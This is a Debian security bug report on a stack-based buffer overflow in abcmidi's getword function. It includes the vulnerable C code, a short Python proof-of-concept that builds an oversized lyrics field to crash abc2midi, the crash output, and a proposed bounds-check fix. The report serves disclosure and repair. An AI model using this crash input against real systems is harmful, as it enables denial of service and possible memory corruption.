[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Bug#1002860: abcmidi: Stack based buffer overflow in the getword function used by abc2midi

Package: abcmidi
Version: 20211212-1
Severity: important
Tags: security

Dear Maintainer,

There is a stack based buffer overflow in the getword function from the genmidi.c file used by abc2midi. The issues exists in the following code:

static int getword(place, w)
/* picks up next syllable out of w: field.
 * It strips out all the control codes ~ - _  * in the
 * words and sends each syllable out to the Karaoke track.
 * Using the place variable, it loops through each character
 * in the word until it encounters a space or next control
 * code. The syllstatus variable controls the loop. After,
 * the syllable is sent, it then positions the place variable
 * to the next syllable or control code.
 * inword   --> grabbing the characters in the syllable and
 *             putting them into syllable for output.
 * postword --> finished grabbing all characters
 * foundnext--> ready to repeat process for next syllable
 * empty    --> between syllables.
 *
 * The variable i keeps count of the number of characters
 * inserted into the syllable[] char for output to the
 * karaoke track. The kspace variables signals that a
 * space was encountered.
 */
int* place;
int w;
{
  char syllable[200];
  unsigned char c; /* [BY] 2012-10-03 */
  int i;
  int syllcount;
  [...]
  while ((syllstatus != postword) && (syllstatus != failed)) {
  syllable[i] = c;
    [...]
  };
  syllable[i] = '\0';
  [...]
  

As can be seen there is syllable buffer with size 200. There is also a while loop, that writes to this buffer. Within this loop there is no check on the index into the buffer. Therefore it is possible to write past the boundaries of the buffer overwriting data on the stack. I wrote a small poc script for this in python:

#!/bin/python3

filecontent = b"""
X:
K:D
0
w::""" + b"A" * 400

f = open("poc.abc", "wb")
f.write(filecontent)
f.close()

This generates a poc.abc file. When executing the current version of abc2midi as follows this leads to a stack overflow:
$ abc2midi poc.abc 
4.64 December 12 2021 abc2midi
Error in line-char 2-0 : Missing Number
Warning in line-char 3-0 : No M: in header, using default
Error in line-char 4-0 : Unrecognized character: 0
Warning in line-char 5-0 : Potentially ambiguous line - either a :| repeat or a field command -- cannot distinguish.
writing MIDI file poc0.mid
*** stack smashing detected ***: terminated
Aborted


Locally I fixed this issue by adding a boundary check to the while loop as follows:

while ((syllstatus != postword) && (syllstatus != failed) && (i<199)) 

I think this should fix the issue, as there does not seem to be a case where two characters are written in the same loop iteration and i should according to the comment at the beginning of the function be the number of characters inserted into this buffer.

Best regards
Kolja
-- System Information:
Debian Release: 11.0
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable-security'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 5.10.0-8-amd64 (SMP w/4 CPU threads)
Kernel taint flags: TAINT_OOT_MODULE, TAINT_UNSIGNED_MODULE
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8), LANGUAGE not set
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled

Versions of packages abcmidi depends on:
ii  libc6  2.31-13+deb11u2

abcmidi recommends no packages.

Versions of packages abcmidi suggests:
pn  abcm2ps                     <none>
ii  evince [postscript-viewer]  3.38.2-1
pn  timidity | pmidi            <none>

-- no debconf information
Reply to: